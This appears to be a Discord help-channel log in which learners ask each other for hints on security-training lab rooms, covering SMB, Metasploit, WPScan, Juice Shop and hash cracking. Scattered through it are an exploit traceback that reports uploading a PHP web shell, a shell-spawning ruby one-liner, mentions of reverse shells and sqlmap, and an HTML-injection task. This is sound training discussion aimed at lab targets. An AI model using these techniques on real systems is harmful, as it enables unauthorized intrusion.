Hello, can anyone help me please for the new cooctus room. I've been on it for hours now and I'm still stuck at the first question

median grove
limber sphinx
limber sphinx
pale scaffold
#

any hint in Sakura room for "What other cryptocurrency did the attacker exchange with using their cryptocurrency wallet?"

limber sphinx
#

go through transactions on their wallet, it's a very specific one that doesn't really change value to USD

sly violet
#

#vulnversity Using the nmap flag -n what will it not resolve?

sly violet
#

can anyone help with this flag -n what will it not resolve?

stuck fractal
#

Read the manual

late patio
#

has anyone finished the webenumeration room?

pale rampart
#

Hello guys

#

I'm following "Web Enumeration" room, Task 9, section "2.2. Practical: WPScan (Deploy #2)", question "WPScan says that this theme is out of date, what does it suggest is the number of the latest version?"

#

I see result suggestion from wpscan but somehow it is wrong for this test

#

2.0 doesn't works

median grove
#

completed the room

pale rampart
#

Any help plz

ashen moon
pale rampart
#

I think there is a typo somewhere

ashen moon
#

maybe

glacial gust
pale rampart
#

But wpscan suggested 2.0

#

Thank you for suggestion

fresh zephyr
#

Hi, I am having a "problem" in the "Network Services Room" in Task 4 "Exploiting SMB". I successfully connected to the named SMB-share. I can also see the document which should let me solve the Question "Who can we assume this profile folder belongs to?" but the document is empty when I open it with "more". I saw that Noah and Hydragyrum hinted to download the file locally and open it afterwards. How can I do that please?

ashen moon
#

use this command and u should get the file in your machine

fresh zephyr
stuck fractal
#

Not replaced.

fresh zephyr
# ashen moon try it

Hmm.. Not working.. I put "get Working From Home Information. txt" and it says nt status object name not found

ashen moon
#

i dont really remember interacting with those files

ashen moon
#

i dont know if we have to put them in quotes or not

fresh zephyr
#

Get Working\ From\ Home\ Information.txt same.. Does not find the file

fresh zephyr
ashen moon
fresh zephyr
ashen moon
white salmon
#

Hey guys I'm in CC: Pentesting and I've got a question about metasploit

fresh zephyr
white salmon
#

I'm doing the last part of the metasploit session, and I'm starting to understand metasploit, but not really xD

#

So I'm using nostromo_code_exec with meterpreter, if that makes sense

white salmon
#

Task 10

ashen moon
#

which question are u stuck at?

white salmon
#

2nd from the end

#

So everytime I write something in the session in metasploit, it returns me the same thing

ashen moon
#

is it asking secret dir?

white salmon
#

if I write ls, it responds ls

#

Yes! That one

ashen moon
#

then try ls

white salmon
#

I just did it

#

And started a shell, but it keeps doing the same thing

#

It responds my ls with ls

ashen moon
white salmon
#

"meterpreter" as a command?

ashen moon
#

then u may get meterpreter

#

then u try ls

white salmon
#

replies with exit

#

I can do background

#

That still works

stuck fractal
#

!docs verify

proud scarabBOT
ashen moon
stuck fractal
#

Follow those steps, then you can post an image

ashen moon
white salmon
#

I will do that then

ashen moon
#

or i think u can try the exploit again, maybe it will work

white salmon
#

Okaay! let me try

#

I'm running it again

#

so I should use a shell first?

#

I thought meterpreter was its own shell

ashen moon
white salmon
#

Okay

ashen moon
#

then u try shell if that dint work

white salmon
#

It works different

ashen moon
white salmon
#

Now it doesnt repeat what I type

#

So it's an improvement

ashen moon
#

tried shell?

#

if its a windows machine u have to do dir

ashen moon
white salmon
#

I was doing lcd

white salmon
stuck fractal
#

You should verify

white salmon
#

Yess, I will

#

Nice, I'm verifyed

#

This is what is returned when I type dir

ashen moon
#

i got no problems, i see the secret dir

white salmon
ashen moon
#

shell first

stuck fractal
#

pwd is useful πŸ˜‰

white salmon
#

I will shell then

ashen moon
#

after shell, you cd into that dir

white salmon
#

I had to go, so I'm not on the computer anymore πŸ˜ͺ sorry

#

But I still want to know something, because metasploit is still a mistery to me

ashen moon
#

it should work after u do shell. or the machine could be broke.

white salmon
#

So meterpreter is not a shell itself, right?

ashen moon
#

shell we can only use the commands present in the target machine

stuck fractal
#

shell in meterpreter drops you into a system shell on the target

ashen moon
stuck fractal
#

wat

ashen moon
#

when we use shell is meterpreter using python -c 'impo......

white salmon
#

But shell needs python to be installed in the target computer, right? When I did it it looked for its binaries

ashen moon
#

meterpreter may look for others too. there is ruby,.... too ig

white salmon
#

I see!

ashen moon
#

i saw that it said it used python for popping shell

white salmon
#

And metasploit always uses an exploit and a payload, right?

#

And the exploit is like the way to get in and the payload what it does once it's in, correct?

stuck fractal
#

An exploit is used to deliver a payload, correct.

ashen moon
#

if sys has ruby in it. meterpreter does this command ig ruby -e 'exec "/bin/sh"'

white salmon
#

And different payloads are used differently, right? like different commands from the ones in meterpreter

#

Metasploit looks super cool to me, but also so big that it's confusing :S

ashen moon
white salmon
#

I just came back and my machine expires in 7 minutes

#

Metasploit speedrun

#

I just did shell, so I'll try cd to that dir

#

Now it doesnt have a feedback

stuck fractal
white salmon
#

I'm not premium this time

ashen moon
#

u can extent without premium ig

white salmon
#

Oh wait, I could :0

#

You are right ahahahah

stuck fractal
#

Just not the attackbox

white salmon
#

Ohh fine

#

Then it's not a speedrun anymore

ashen moon
#

or try restarting the box and do the exploit again, wont do any harm

#

only if it still dont work

white salmon
#

Can I do that without premium too? I thought I needed to be premium for that

stuck fractal
#

IIRC msf shells are a bit weird

white salmon
#

Sure, I can restart it

stuck fractal
#

Like you need to background then foreground then it works well

white salmon
#

I can do that

#

I didn't restart the target machine, but I hope this does it

#

Or maybe I broke something in it? πŸ€”

#

Okay, so now everything worked just fine

#

I just finished the section. All I needed to do was to kill the first two sessions

#

Thank you so much! πŸ™

ashen moon
white salmon
#

And about metasploit, meterpreter is the only payload I've ever used

#

Are the other payloads like this one? I mean this interactive

#

I expected payload to be more like a script that would run some code and finish

molten bear
#

Hello everyone. I was finishing Juice Shop and noticed the persistent XSS is broken. I tried some other things, it was working but not returning the green header with the hash. Then read the write-ups, used the same payloads and still not working. Anyone else facing this issue? Tried looking in the score-card if it was there but no luck

inland onyx
#

Please do not provide or ask for help or hints for the Different CTF room until 19th April, 7pm (UTC) πŸ™‚

white salmon
#

who did the room; Different CTF?

stuck fractal
proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

white salmon
#

ahw cool.

#

Heloo, anyone can help me on the beginner room called "network services"? I'm stuck on Telnet, after I connected to tenet it does not display any welcome message, nmap fingerprint also doesnot show anything.
Nmap returns an open tcp port (non standard for telnet), I connect using "telnet ip port", result:
Trying ip <ip>...
Connected to ...
Escape character is ...
and that's it

white salmon
#

I you are still stuck, it has been a long time

#

Basicly I remember I had a problem in that room too, because for anything to run you need to write .RUN in front of it

solar topaz
white salmon
#

So, for example, instead of:
ping 10.X.Y.Z -c 1

#

You should write:
.RUN ping 10.X.Y.Z -c 1

#

And I think telnet didn't have any feedback, so you won't see errors when you type things in it

white salmon
#

Because maybe that's why it's not working for them

#

He said something about an open tcp port

solar topaz
#

Yes I had to connect

white salmon
#

Oh okay, then nevermind

solar topaz
#

It also showed up in the nmap fingerprint

#

@white salmon is it a 4 digit port number? (Avoiding spoilers haha)

rotund dagger
#

@white salmon Just ran through the room. Are you sure you are typing the telnet connection right?

#

if you are, the welcome message should contain the username you enumerated previously

burnt marsh
#

Hello All, I am working on the OWASP top 10 task 29. I have found the exploit to run however I get this when I run it:

`python 47887.py http://10.10.196.202/admin_add.php 1 β¨―

Attempting to upload PHP web shell...
Traceback (most recent call last):
File "47887.py", line 28, in <module>
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 119, in post
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 61, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 530, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 665, in send
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 166, in resolve_redirects
requests.exceptions.TooManyRedirects: Exceeded 30 redirects.`

wraith dust
burnt marsh
#

Yes

wraith dust
# burnt marsh Yes

i would try redownloading the exploit and running the file again. im assuming you've done that bit too though?

burnt marsh
#

Not yet. Is there a package I could be missing? This is from my VM not the browser based one

wraith dust
#

looks like it's the proper exploit, just timed out after too many redirects. you could try again on the THM attack box if redownloading the exploit doesn't work tho

white salmon
white salmon
#

That's why I had problems with it. Anyway I know it because I took notes back then, maybe it's wrong

#

I didn't try it today

white salmon
desert sedge
#

Anyone got a second to help me out with a question in the uploadvulns room?

#

Nvm, im dumb and had included my targets IP in the reverse shell code instead of my attack IP πŸ˜†

solar topaz
ebon palm
#

Hello, I'm new in the world of contrast and when I start learning suspended in a question I did not unterstand

slender sand
#

Did anyone solved the room "Different CTF". I got stuck after finding the secret directory. Can anyone help ?

harsh cove
#

i`m stuck at web enumeration cant find the flag in those two vhosts at practical gobuster

white salmon
#

you talking about DIfferent CTF? @harsh cove

slender sand
#

Thanks man

harsh cove
white salmon
#

ahw cool!

high onyx
#

I know, it's too early to ask for hint for Different CTF, but does anyone have an idea for finding secret directory?

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

@high onyx @white salmon no help or hints yet...

high onyx
#

Ah, ok then...

white salmon
#

I deleted the hint @stuck fractal

delicate tinsel
#

i have reached far

astral smelt
delicate tinsel
#

okk

silent narwhal
stuck fractal
#

Because none of those are correct for share names.

silent narwhal
#

i actually didnt get what it means

stuck fractal
#

Well you need to do that first

silent narwhal
#

i did enum4linux ip -A

stuck fractal
#

You can list the shares with either Enum4linux or smbclient

silent narwhal
#

ok, ill look at it

#

ok done thanks james

high hamlet
#

anyone done 'Different CTF' room and can dm me? I think i've gotten an initial foothold but been stuck for a while...can share what I have already if needed

solid halo
#

can i get hint there is already hint but i can't figure it out

#

root (MiTRE)

#

Task 5

mossy hazel
#

Hi, in OWASP Juice Shop room task 7, i added the header, logged back to the admin account and to the Last Login IP page, i got the alert but didn't get any flag, i restarted the machine and tried different browser. what should i do?

slender sand
#

@high onyx The announcements are not gonna made till 19th.

high onyx
white salmon
#

I need a hint for the pickle rick room pls

#

i cant find anything really useful, ive found the username but thats about it

fallen skiff
#

So in ICE, I picked the first exploit listed for the target box, but when I type use (full path) it says no payload configured, defaulting to blah

#

Which I attempted after I backgrounded my session

fallen skiff
#

What was the point if it was just gonna say I can't anyway

stuck fractal
#

What?

#

Can't what?

fallen skiff
#

It's having me do that, but it's saying no payload configured and defaulting to blah

stuck fractal
fallen skiff
#

Well, I guess I'm easking is it "selected" with the use command and path I attempte4d?

#

Oooh it did work

#

Nvm

stuck fractal
fallen skiff
#

Though I don't see that I have elevated privs

stuck fractal
#

!docs verify

proud scarabBOT
stuck fractal
#

Please follow these steps, then you can post images.

fallen skiff
#

Thank you, just finished those steps

#

Nvm

#

I see the issue, session "2" had the elevated privs

stuck fractal
#

That room is still under help and hints embargo, so please wait until that's over before asking.

#

You can see the date and time it ends in the pinned messages

white salmon
solar topaz
white salmon
#

What are some nice ways of testing SQL injection on a login form? I'm thinking maybe burpsuite using a sql injection list but burp is so slow with the throttling and whatnot

#

hmmm wait could I perhaps use hydra for this? I did use hydra for bruteforcing a login page, so wouldn't this be the same principle just using a SQL injection wordlist?

ripe hedge
#

You can always run through it manually

#

But I'd probably throw sqlmap at it as well

harsh cove
#

need help please anyone know Which HTTP response header allows us to send an authenticated POST request?

faint kayak
#

Could somebody please help with Linux fundamentals 3? I thought I got everything, but I'm clearly missing something. Task 7 is asking me to create a file called test1234, which I've done. I've also found the binary shiba4 it's asking for, but when I run it all it does is output edited. I'm sure I'm going wrong somewhere, but can't figure out where 😦

Edit: nevermind, I'm a moron πŸ˜‚ I thought it would be something more... like the previous passwords

white salmon
#

I could use a hint in the Pickle Rick room, been stuck a few days now but i dont wanna look at the writeup

opal vine
#

where are you stuck?

white salmon
#

I know theres some XSS vulnerability but I'm really not sure at all how I can use this to my advantage

#

the login portal page

#

I know the username

#

just not the password and I assume I'm not supposed to brute force my way in lol

opal vine
#

well do you have the login form?

#

can you login?

white salmon
#

no I only have the username so can't login yet

#

i have access to the login page though

opal vine
#

did you brute force using gobuster

#

dirb or anything like that

white salmon
#

i used dirsearch yeah

opal vine
#

can you show me the command you used

white salmon
#

sure, i think its missing a lot because this time it didnt even notice the login page

opal vine
#

yup that's the thing

white salmon
#

I might try using recursive or something

opal vine
#

pretty nice
but you need something extra

#

you need to look for extensions

white salmon
#

yeah off the top of my head one thats missing would be .bak

#

.txt too

#

markdown maybe

opal vine
#

well yes these are good

#

but what are the most common extensions that the websites use?

#

hmmmm

white salmon
#

uhh php, html, js

#

hmmmm

opal vine
#

nice

#

try those

white salmon
#

those were defaulted so it should have picked up them but since it didnt pickup /login.php it probably didn't work as intended, I'll try manually adding them and rerunning it πŸ˜„

#

thanks man πŸ™‚

opal vine
#

oh ok i don't know what's default in dirsearch i don't use it
but now you know what to do

late chasm
#

Have anyone completed the Different CTF room

white salmon
#

embargo check pin

delicate tinsel
#

How many people are stuck on DIFFERENT CTF!!??!!

stuck fractal
#

Please do not provide or ask for help or hints for the Different CTF room until 19th April, 7pm (UTC)
Please don't ask yet.

white salmon
#

Can I get a hint to OWASP Top 10 Room Task 20...I found the document cookies but not sure what to do with this ? Am I suppose to crack it? If so i tried decrypting it with crack station but doesn't work

stuck fractal
#

Cookies are very rarely hashes for you to crack

#

They're usually randomly generated data

white salmon
#

This is what I found ||connect.sid=s%3AqQQ5fyXMHbkt8gvFJYS5_p6Qu6s3cS2D.VklAkXKd03bbahZTXA1a53bbtux3m%2BOPo5lDozIrhy8||

#

Wow, I got the flag πŸ€¦β€β™‚οΈ

white salmon
#

What does ToE mean here?

white salmon
#

I don't get it..I type ||"James Duncan Davidson" ||as the answer but it is not correct according to THM? there are three "..." and i dunno what else it could be? Any hints? - OWASP Top 10 Room Task 21..

white salmon
#

the ... stands for "the"

#

Ohhh that's right inside the "||The full name||" <--- that's the hint ty

livid thunder
#

Can someone help me with this question please : View the website on this task and inject HTML so that a malicious link to hacker.c is shown.

livid thunder
#

How websites work

ashen moon
#

task number?

livid thunder
#

we see it or

ashen moon
#

search for how to set links in html you will get the anwers

livid thunder
#

it's good it works

ashen moon
#

you could possibly get the answer by googling

simple mountain
#

Please do not provide or ask for help or hints for the M4tr1x: Exit Denied room until 21st April, 7pm (UTC)

chilly lily
#

I'm currently working on the crack the hash room. I'm a bit confused. In the first challenge set there is a hash that shows as bcrypt through hashid. I tried using hashcat (nvidia gtx 1050) but it shows as taking up to 6 days to complete. The hint says it's not really bcrypt though. After breaking down I checked some walkthroughs and folks seem to be using brcypt through hashcat with no optimizations. I understand bcrypt is slow, but this duration seems unlikely considering it's a challenge. Am I doing something wrong?

stuck fractal
#

You know the password length. Exploit that.

ripe hedge
#

you can probably cut down a few words πŸ™‚

pallid moss
#

On Attacking Kerbersos (Kerberos Server) room I'm getting "Salt-length exception No hashes loaded." for the user and admin hashes when using hashcat. John on the other hand cracks it no problem.

wet rampart
#

Hey,

#

Room Steel Mountain Task 3

#

When I do ..\PowerUp.ps1

#

nothing

#

@stuck fractal ?

stuck fractal
#

Please don't just ping me when you want help.
Everyone here is a volunteer. We help when we want to.